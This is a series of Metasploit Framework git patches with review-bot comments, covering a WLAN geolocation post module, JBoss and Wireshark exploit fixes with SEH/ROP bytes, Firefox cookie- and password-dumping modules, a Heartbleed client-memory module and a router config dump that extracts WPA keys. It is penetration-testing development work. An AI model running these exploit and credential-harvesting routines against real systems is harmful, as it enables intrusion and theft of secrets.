@@ -6,12 +6,16 @@ require 'msf/core' require 'msf/core/handler/reverse_ipv6_http' - +require 'msf/core/module/deprecated' module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 7, 30) + DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https' def initialize(info = {}) super(merge_info(info, diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb index fd0206c91c..f2c7c3e40a 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb @@ -3,13 +3,19 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + require 'msf/core' require 'msf/core/handler/reverse_ipv6_https' +require 'msf/core/module/deprecated' module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Module::Deprecated + + DEPRECATION_DATE = Date.new(2014, 7, 30) + DEPRECATION_REPLACEMENT = 'windows/meterpreter/reverse_https' def initialize(info = {}) super(merge_info(info, From d4c0d015c1d279bbe3061f9f4dbdb697b0521b11 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Thu, 24 Apr 2014 07:04:50 -0500 Subject: [PATCH 156/853] Update wlan_geolocate.rb Updated based on feedback. Also added enumeration only support for BSD and Solaris. --- modules/post/multi/gather/wlan_geolocate.rb | 168 +++++++++++++------- 1 file changed, 112 insertions(+), 56 deletions(-) diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index b959960fbe..f3c7f957e7 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb 
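Review bot: `DEPRECATION_REPLACEMENT` in reverse_ipv6_http.rb names `windows/meterpreter/reverse_https`, the same value as in reverse_ipv6_https.rb in the next hunk, so users of the plain-HTTP stager are pointed at the HTTPS one. If that is deliberate, a short comment on the constant would say so; if it is a copy-paste, the HTTP counterpart should be named instead. The replacement is a full payload name while the deprecated module is a stager, which may make the warning text confusing.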
@@ -12,15 +12,21 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Multiplatform Wireless LAN Geolocation', - 'Description' => %q{ Geolocate the target device by gathering local - wireless networks and performing a lookup against Google APIs.}, + 'Name' => 'Multiplatform WLAN Enumeration and Geolocation', + 'Description' => %q{ Enumerate wireless networks visible to the target device. + Optionally geolocate the target by gathering local wireless networks and + performing a lookup against Google APIs.}, 'License' => MSF_LICENSE, 'Author' => [ 'Tom Sellers fadedcode.net>'], - 'Platform' => %w{ osx win linux }, + 'Platform' => %w{ osx win linux bsd solaris }, 'SessionTypes' => [ 'meterpreter', 'shell' ], )) + register_options( + [ + OptBool.new('GEOLOCATE', [ false, 'Use Google APIs to geolocate Linux, Windows, and OS X targets.', false]) + ], self.class) + end def get_strength(quality) 
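Review bot: The new `GEOLOCATE` option description does not say that enabling it submits the collected access-point data to a third-party service. That is the one behaviour an operator working under rules of engagement or data-handling terms needs to know before switching it on. Suggest wording such as `'Send the enumerated access points to the Google geolocation API to estimate the target location'`, and one sentence to the same effect in the module 'Description'.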
@@ -81,62 +87,13 @@ class Metasploit3 < Msf::Post return wlan_list end + def perform_geolocation(wlan_list) - # Run Method for when run command is issued - def run - if session.type =~ /shell/ - # Use the shell platform for selecting the command - platform = session.platform - else - # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform - platform = session.sys.config.sysinfo['OS'] - end - - - case platform - when /win/i - - listing = cmd_exec('netsh wlan show networks mode=bssid') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_win(listing) - end - - when /osx/i - - listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_osx(listing) - end - - when /linux/i - - listing = cmd_exec('iwlist scanning') - if listing.nil? - print_error("Unable to generate wireless listing..") - return nil - else - store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") - wlan_list = parse_wireless_linux(listing) - end - else - print_error("The target's platform is not supported at this time.") - return nil - end - - if wlan_list.nil? || wlan_list.empty? + if wlan_list.blank? print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.") return end - # Build and send the request to Google url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}" uri = URI.parse(URI.encode(url)) 
@@ -154,9 +111,108 @@ class Metasploit3 < Msf::Post print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.") print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}") else - print_error("Failure connecting to Google for location lookup") + print_error("Failure connecting to Google for location lookup.") end + end + + + # Run Method for when run command is issued + def run + if session.type =~ /shell/ + # Use the shell platform for selecting the command + platform = session.platform + else + # For Meterpreter use the sysinfo OS since java Meterpreter returns java as platform + platform = session.sys.config.sysinfo['OS'] + end + + + case platform + when /win/i + + listing = cmd_exec('netsh wlan show networks mode=bssid') + if listing.nil? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.windows.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + # The wireless output does not lend itself to displaying on screen for this platform. + print_status("Wireless list saved to loot.") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_win(listing) + perform_geolocation(wlan_list) + return + end + end + + when /osx/i + + listing = cmd_exec('/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s') + if listing.nil? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.osx.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_osx(listing) + perform_geolocation(wlan_list) + return + end + end + + when /linux/i + + listing = cmd_exec('iwlist scanning') + if listing.nil? 
+ print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.linux.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + # The wireless output does not lend itself to displaying on screen for this platform. + print_status("Wireless list saved to loot.") + if datastore['GEOLOCATE'] + wlan_list = parse_wireless_linux(listing) + perform_geolocation(wlan_list) + return + end + end + + when /solaris/i + + listing = cmd_exec('dladm scan-wifi') + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.solaris.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] + return + end + + when /bsd/i + + interface = cmd_exec("dmesg | grep -i wlan | cut -d ':' -f1 | uniq") + # Printing interface as this platform requires the interface to be specified + # it might not be detected correctly. + print_status("Found wireless interface: #{interface}") + listing = cmd_exec("ifconfig #{interface} scan") + if listing.blank? + print_error("Unable to generate wireless listing.") + return nil + else + store_loot("host.bsd.wlan.networks", "text/plain", session, listing, "wlan_networks.txt", "Available Wireless LAN Networks") + print_status("Target's wireless networks:\n\n#{listing}\n") + print_error("Geolocation is not supported on this platform.\n\n") if datastore['GEOLOCATE'] + return + end + + else + print_error("The target's platform, #{platform}, is not supported at this time.") + return nil + end rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError rescue ::Exception => e From 8f47edb8998429d6a02ce979b57790c4ffd1531f Mon Sep 17 00:00:00 2001 
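Review bot: In the `/bsd/i` branch of `run`, `interface` comes from the `dmesg | grep -i wlan` pipeline and is interpolated into `ifconfig #{interface} scan` with no check. If no wireless interface is found the string is empty, and if several are found it holds more than one line, so the second command is malformed in both cases while the module still prints "Found wireless interface:". A guard before the `ifconfig` call, such as `return print_error("No single wireless interface found.") unless interface =~ /\A[a-z]+\d+\z/i`, would cover both. Separately, the win, osx and linux branches still test `listing.nil?` while the new solaris and bsd branches use `listing.blank?`; using `blank?` in all five avoids storing an empty listing as loot.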
From: Tom Sellers Date: Thu, 24 Apr 2014 12:37:14 -0500 Subject: [PATCH 157/853] JBoss_Maindeployer: improve feedback against CVE-2010-0738 The exploit against CVE-2010-0738 won't work when using GET or POST. In the existing code the request would fail and the function would return a nil. This would be passed to detect_platform without being checked and cause the module to crash ungracefully with the error: Exploit failed: NoMethodError undefined method `body' for nil:NilClass The first changes detect a 401 authentication message and provide useful feedback. Given that if, in any case, 'res' is not a valid or useful response the second change just terminates processing. I've stayed with the module's coding style for consistency. --- modules/exploits/multi/http/jboss_maindeployer.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 1ef454ed64..77b3a3b126 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -315,9 +315,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => path }, 20) + if (res) && (res.code == 401) + fail_with(Failure::NoAccess,"Unable to bypass authentication. Try changing the verb to HEAD to exploit CVE-2010-0738.") + end + if (not res) or (res.code != 200) - print_error("Failed: Error requesting #{path}") - return nil + fail_with(Failure::Unknown,"Failed: Error requesting #{path}") end res From 2e76db01d7a3923a51ff73047d7c07e4a9da1da2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:12 -0500 Subject: [PATCH 158/853] Try to stick to the 100 columns per line rule --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
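Review bot: The second check still treats "no response at all" and "a response with a non-200 status" as the same case and reports both as `Failure::Unknown`, so the user cannot tell a timeout from a rejection by the server. Splitting it keeps the nil guard and puts the status in the message: `fail_with(Failure::Unreachable, "No response requesting #{path}") unless res` followed by `fail_with(Failure::UnexpectedReply, "HTTP #{res.code} requesting #{path}") if res.code != 200`. This helper also used to return nil on failure and now raises, so any caller that relied on the nil return changes behaviour. The enclosing method starts above this hunk and its callers are not visible here.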
diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 16f1f81771..4678451385 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << "\x6c\x7d\x37\x6c" # NOP RETN packet << ropchain - packet << payload.encoded # Shellcode + packet << payload.encoded # Shellcode packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length) # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000 @@ -125,7 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote # When file is open with GUI interface. This is NSEH/SEH overwrite packet << make_nops(4) # nseh - packet << "\x55\x59\x80\x6b" # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** + packet << "\x55\x59\x80\x6b" print_status("Preparing payload") filecontent = magic_header From ba8d7801f4758eceff0d8950814921cf2060bdb3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:15:49 -0500 Subject: [PATCH 159/853] Remove default target because there is no auto-select --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 4678451385..21664b9d7b 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote ], ], 'Privileged' => false, - 'DisclosureDate' => 'Mar 20 2014', - 'DefaultTarget' => 1)) + 'DisclosureDate' => 'Mar 20 2014' + )) register_options( [ 
From a39855e20d9265e3292c5e930b8d5c01fb184ac8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:16:24 -0500 Subject: [PATCH 160/853] Works for XP SP3 too --- modules/exploits/windows/misc/wireshark_mpeg_overflow.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb index 21664b9d7b..dc4146c897 100644 --- a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'jmpesp' => 0x68e2bfb9, } ], - [ 'WinXP SP2 English (bypass DEP)', + [ 'WinXP SP2/SP3 English (bypass DEP)', { 'OffSet2' => 70692, 'OffSet' => 70476, From cde9080a6aa90b16ee57a8fd83923187d13249c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 Apr 2014 13:17:08 -0500 Subject: [PATCH 161/853] Move module to fileformat --- .../windows/{misc => fileformat}/wireshark_mpeg_overflow.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/{misc => fileformat}/wireshark_mpeg_overflow.rb (100%) diff --git a/modules/exploits/windows/misc/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb similarity index 100% rename from modules/exploits/windows/misc/wireshark_mpeg_overflow.rb rename to modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb From f94d1f6546ce9ee9e02e2e018b8c1cc519c2bcff Mon Sep 17 00:00:00 2001 
From: joev Date: Thu, 24 Apr 2014 15:07:48 -0500 Subject: [PATCH 162/853] Refactors firefox js usage into a mixin. --- .../exploit/remote/firefox_privilege_escalation.rb | 12 +++++++++++- .../browser/webview_addjavascriptinterface.rb | 2 +- modules/post/firefox/gather/cookies.rb | 13 +++++++------ modules/post/firefox/gather/history.rb | 6 +----- modules/post/firefox/gather/passwords.rb | 4 +--- modules/post/firefox/gather/xss.rb | 5 ++--- 6 files changed, 23 insertions(+), 19 deletions(-) diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index b03172c234..b36e245414 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -9,7 +9,17 @@ module Msf module Exploit::Remote::FirefoxPrivilegeEscalation - + + # Sends the +js+ code to the remote session, which executes it in Firefox's + # privileged javascript context + # @return [String] the results that were sent back. This can be achieved through + # calling the "send" function, or by just returning the value in +js+ + def js_exec(js) + print_status "Running the privileged javascript..." + session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]") + session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + end + # Puts the shellcode into memory, adds X flag, and calls it # The js function throws on error # @return [String] javascript code containing the execShellcode() javascript fn diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..1ebd1204d8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote def html "" end -end +end \ No newline at end of file 
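Review bot: `js_exec` reads `datastore['TIMEOUT']` and `session`, but the mixin as shown in this hunk neither registers a `TIMEOUT` option nor documents that the including module must provide one and must run against a session. If a module includes the mixin without that option the timeout argument is nil, and what `shell_read_until_token` does with nil is not visible here. I would extend the doc comment with `# @param js [String] the javascript source to run` and `# The including module must register a TIMEOUT option`, or register the option in the mixin itself. The comment should also say that the return value can be empty when the token is never seen, since every caller in this commit tests `results.present?`.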
diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index ce6c5a69e7..18cefbef6f 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin cookies = JSON.parse(results) + cookies.each do |entry| + entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } + end + file = store_loot("firefox.cookies.json", "text/json", rhost, results) print_good("Saved #{cookies.length} cookies to #{file}") rescue JSON::ParserError => e @@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post %Q| (function(send){ try { + var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa; var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var cookies = []; @@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post while (iter.hasMoreElements()){ var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie){ - cookies.push({host:cookie.host, name:cookie.name, value:cookie.value}) + cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)}) } } send(JSON.stringify(cookies)); diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 75808963c0..1db4ed7993 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb 
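Review bot: In `run`, the new loop base64-decodes every field of the parsed `cookies` array, but `store_loot` is still given `results`, the raw string read from the session. The saved file therefore holds the base64-encoded values, and the decoded data is used only for `cookies.length`. Passing the decoded structure, `file = store_loot("firefox.cookies.json", "text/json", rhost, cookies.to_json)`, makes the stored file match what the loop produces. The decode is also applied to whatever each key holds, so a non-string value in the JSON would raise outside the `JSON::ParserError` rescue; the javascript in the later hunks appears to emit only strings, so this is a robustness note rather than an observed failure.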
@@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin history = JSON.parse(results) diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index d3db014177..24130d0f4e 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin passwords = JSON.parse(results) diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index 4d2e960e69..63049a2a7b 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -10,6 +10,7 @@ require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post include Msf::Payload::Firefox + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, @@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post end def run - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) - + results = js_exec(js_payload) if results.present? print_good results else From fd232b1acd6184999123d8c4ee184cce4498c585 Mon Sep 17 00:00:00 2001 
From: Ramon de C Valle Date: Fri, 25 Apr 2014 01:48:17 -0300 Subject: [PATCH 163/853] Use the protocol version from the handshake I used the protocol version from the record layer thinking I was using the protocol version from the handshake. This commit fix this and uses the protocol version from the handshake instead of from the record layer as in https://gist.github.com/rcvalle/10335282, which is how it should have been initially. Thanks to @wvu-r7 for finding this out! --- .../server/openssl_heartbeat_client_memory.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index e57c9724c3..f24a46fedf 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary # Process cleartext TLS messages def process_openssl_cleartext_request(c, data) - message_type, message_version = data.unpack("Cn") + message_type, message_version, protocol_version = data.unpack("Cn@9n") if message_type == 0x15 and data.length >= 7 message_level, message_reason = data[5,2].unpack("CC") @@ -165,7 +165,7 @@ class Metasploit3 < Msf::Auxiliary @state[c][:received_hello] = true print_status("#{@state[c][:name]} Sending Server Hello...") - openssl_send_server_hello(c, data, message_version) + openssl_send_server_hello(c, data, protocol_version) return end @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary else # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c, message_version) + openssl_send_heartbeat(c, protocol_version) end # Process cleartext heartbeat replies 
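Review bot: `data.unpack("Cn@9n")` in `process_openssl_cleartext_request` seeks to absolute offset 9 in data supplied by the connecting peer, and Ruby raises ArgumentError ("@ outside of string") when that offset lies beyond the end of the string. A record shorter than 9 bytes therefore aborts the handler, including the 7-byte alert records that the next line (`data.length >= 7`) is written to accept. The same unpack is added to `process_openssl_encrypted_request` (hunk at -216), where it runs before `return unless data.length > 5`. Reading the extra field only when it is present avoids this: keep `data.unpack("Cn")` and add `protocol_version = data.length >= 11 ? data[9, 2].unpack("n").first : message_version`. Both methods start and end outside these hunks.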
@@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary # Process encrypted TLS messages def process_openssl_encrypted_request(c, data) - message_type, message_version = data.unpack("Cn") + message_type, message_version, protocol_version = data.unpack("Cn@9n") return if @state[c][:shutdown] return unless data.length > 5 @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c, message_version) + openssl_send_heartbeat(c, protocol_version) end # Process heartbeat replies From 8f43c229b102f25b907d10f34f189c92413dc33a Mon Sep 17 00:00:00 2001 From: lsanchez-r7 Date: Fri, 25 Apr 2014 11:15:39 -0500 Subject: [PATCH 164/853] Passing the Mdm::Task down the chain when reporting hosts from an Mdm::Task we need to pass the task all the way down. this wasnt done for the metasploit import format. --- lib/msf/core/db.rb | 5 ++++- lib/msf/core/db_manager/import_msf_xml.rb | 2 ++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index c74b205f0b..16d3bcac8d 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -4222,7 +4222,10 @@ class DBManager parser = Rex::Parser::RetinaXMLStreamParser.new parser.on_found_host = Proc.new do |host| hobj = nil - data = {:workspace => wspace} + data = { + :workspace => wspace, + :task => args[:task] + } addr = host['address'] next if not addr diff --git a/lib/msf/core/db_manager/import_msf_xml.rb b/lib/msf/core/db_manager/import_msf_xml.rb index f3e37b2268..8d70b5e1d0 100644 --- a/lib/msf/core/db_manager/import_msf_xml.rb +++ b/lib/msf/core/db_manager/import_msf_xml.rb @@ -204,6 +204,7 @@ module Msf doc.elements.each("/#{btag}/hosts/host") do |host| host_data = {} + host_data[:task] = args[:task] host_data[:workspace] = wspace host_data[:host] = nils_for_nulls(host.elements["address"].text.to_s.strip) if bl.include? host_data[:host] 
@@ -247,6 +248,7 @@ module Msf host.elements.each('services/service') do |service| service_data = {} + service_data[:task] = args[:task] service_data[:workspace] = wspace service_data[:host] = hobj service_data[:port] = nils_for_nulls(service.elements["port"].text.to_s.strip).to_i From 696eee1ada198da4bb70ca2d994fe968e373cf19 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 25 Apr 2014 14:27:44 -0500 Subject: [PATCH 165/853] Add Outpost24 to db_import help --- lib/msf/ui/console/command_dispatcher/db.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index f779e4de63..bf3f39eb3d 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1320,6 +1320,7 @@ class Db print_line " NeXpose XML Report" print_line " Nmap XML" print_line " OpenVAS Report" + print_line " Outpost24 XML" print_line " Qualys Asset XML" print_line " Qualys Scan XML" print_line " Retina XML" From 9964548b4180f15a1882d8b106c4151310a6e0a9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 25 Apr 2014 14:28:29 -0500 Subject: [PATCH 166/853] Amend spec for db_import help --- spec/lib/msf/ui/command_dispatcher/db_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb index f5dde21917..5b058d4fb3 100644 --- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb @@ -237,6 +237,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do " NeXpose XML Report", " Nmap XML", " OpenVAS Report", + " Outpost24 XML", " Qualys Asset XML", " Qualys Scan XML", " Retina XML" From b80d366bb7fadb50366d8fe834a6fbb84963d5d2 Mon Sep 17 00:00:00 2001 
From: nodeofgithub Date: Sat, 26 Apr 2014 15:52:31 +0200 Subject: [PATCH 167/853] Add filter to output WPA-PSK password on Netgear DG834GT --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 35f7127993..726e183d8b 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Auxiliary ['Wifi Key 1', /wifi_key1=(\S+)/i], ['Wifi Key 2', /wifi_key2=(\S+)/i], ['Wifi Key 3', /wifi_key3=(\S+)/i], - ['Wifi Key 4', /wifi_key4=(\S+)/i] + ['Wifi Key 4', /wifi_key4=(\S+)/i], + ['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i] ] } From 60e7e9f5152c0d827de29a7914dbc4fd82129ba2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 27 Apr 2014 10:40:46 -0500 Subject: [PATCH 168/853] Add module for CVE-2013-5331 --- data/exploits/CVE-2013-5331/Exploit.swf | Bin 0 -> 5122 bytes .../source/exploits/CVE-2013-5331/Exploit.as | 897 ++++++++++++++++++ .../adobe_flash_filters_type_confusion.rb | 131 +++ 3 files changed, 1028 insertions(+) create mode 100755 data/exploits/CVE-2013-5331/Exploit.swf create mode 100755 external/source/exploits/CVE-2013-5331/Exploit.as create mode 100644 modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb 
